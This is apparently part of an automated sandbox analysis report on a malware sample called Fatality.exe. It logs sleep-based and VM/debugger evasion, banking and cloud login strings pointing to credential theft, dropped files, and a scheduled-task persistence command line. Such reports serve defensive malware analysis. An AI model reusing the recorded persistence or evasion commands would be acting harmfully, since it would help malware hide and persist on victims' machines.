                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590453
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590343
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590234
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590122
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590006
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589813
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589409
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589281
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589171
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589062
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 588952
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeWindow / User API: threadDelayed 424Jump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWindow / User API: threadDelayed 4784
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWindow / User API: threadDelayed 4840
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeDropped PE file which has not been started: C:\Users\user\Desktop\AqqubUji.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeDropped PE file which has not been started: C:\Users\user\Desktop\UXzikyum.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeDropped PE file which has not been started: C:\Users\user\Desktop\rfcELAFu.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\pMLeDcaM.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeDropped PE file which has not been started: C:\Users\user\Desktop\LfISQjWH.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\MMFizuKP.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\EiwsPBui.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\XAjYjGFx.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\nKZvhtVR.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeDropped PE file which has not been started: C:\Users\user\Desktop\vVSvSxGn.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exe TID: 424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 3796Thread sleep time: -30000s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -28592453314249787s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -600000s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -599874s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -599734s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -599000s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 3472Thread sleep time: -14400000s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -598500s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -598343s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -597609s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -597390s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -597125s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -597000s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -596875s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -596656s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -596499s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -596296s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -595562s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -594828s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -594677s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -594531s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -594397s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -594198s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -594093s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593965s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593855s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593740s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593608s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593499s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593390s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593280s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593170s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -593058s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -592950s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -592843s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -592731s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -592015s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591905s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591796s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591687s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591578s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591468s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591358s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591210s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -591108s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590999s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590883s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590781s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590671s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590562s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590453s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590343s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590234s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590122s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -590006s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -589813s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -589409s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -589281s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -589171s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -589062s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5728Thread sleep time: -588952s >= -30000s
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe TID: 5192Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Bridgemonitor\BridgeInto.exe TID: 5612Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Bridgemonitor\BridgeInto.exe TID: 4508Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\dllhost.exe TID: 5316Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\dllhost.exe TID: 5876Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\dllhost.exeFile opened: PhysicalDrive0Jump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Bridgemonitor\BridgeInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Bridgemonitor\BridgeInto.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Bridgemonitor\BridgeInto.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_04D5685F NtQueryInformationProcess,GetSystemInfo,0_2_04D5685F
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 30000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 600000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 599874
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 599734
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 599000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 3600000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 598500
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 598343
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597609
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597390
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597125
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596875
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596656
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596499
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596296
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 595562
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594828
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594677
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594531
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594397
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594198
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594093
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593965
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593855
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593740
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593608
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593499
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593390
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593280
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593170
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593058
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592950
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592843
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592731
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592015
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591905
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591796
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591687
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591578
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591468
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591358
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591210
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591108
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590999
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590883
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590781
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590671
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590562
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590453
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590343
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590234
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590122
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590006
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589813
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589409
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589281
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589171
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 589062
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 588952
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                              Source: VUumaksQ1L.25.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                              Source: BridgeInto.exe, 00000006.00000002.2349417385.000000001C124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
                              Source: VUumaksQ1L.25.drBinary or memory string: discord.comVMware20,11696487552f
                              Source: VUumaksQ1L.25.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                              Source: VUumaksQ1L.25.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                              Source: VUumaksQ1L.25.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                              Source: WebCacheV01.dat.8.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: global block list test formVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: tasks.office.comVMware20,11696487552o
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                              Source: VUumaksQ1L.25.drBinary or memory string: AMC password management pageVMware20,11696487552
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3408421293.000000001BAE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: VUumaksQ1L.25.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                              Source: VUumaksQ1L.25.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: dev.azure.comVMware20,11696487552j
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                              Source: VUumaksQ1L.25.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                              Source: VUumaksQ1L.25.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                              Source: Fatality.exe, Fatality.exe, 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                              Source: VUumaksQ1L.25.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                              Source: VUumaksQ1L.25.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                              Source: Fatality.exe, Fatality.exe, 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                              Source: VUumaksQ1L.25.drBinary or memory string: outlook.office.comVMware20,11696487552s
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                              Source: VUumaksQ1L.25.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                              Source: VUumaksQ1L.25.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                              Source: wscript.exe, 00000002.00000002.2283430964.0000000002FF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
                              Source: VUumaksQ1L.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                              Source: VUumaksQ1L.25.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                              Source: C:\Users\user\Desktop\Fatality.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Hides threads from debuggers
                              Source: C:\Users\user\Desktop\Fatality.exeThread information set: HideFromDebuggerJump to behavior
                              Tries to detect sandboxes and other dynamic analysis tools (window names)
                              Source: C:\Users\user\Desktop\Fatality.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\Desktop\Fatality.exeFile opened: SIWDEBUG
                              Source: C:\Users\user\Desktop\Fatality.exeFile opened: NTICE
                              Source: C:\Users\user\Desktop\Fatality.exeFile opened: SICE
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_04D56071 mov eax, dword ptr fs:[00000030h]0_2_04D56071
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_04D56396 mov eax, dword ptr fs:[00000030h]0_2_04D56396
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess token adjusted: Debug
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeProcess token adjusted: Debug
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess token adjusted: Debug
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess token adjusted: Debug
                              Source: C:\Recovery\dllhost.exeProcess token adjusted: Debug
                              Source: C:\Recovery\dllhost.exeProcess token adjusted: Debug
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Bridgemonitor\BridgeInto.exe "C:\Bridgemonitor/BridgeInto.exe"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /fJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
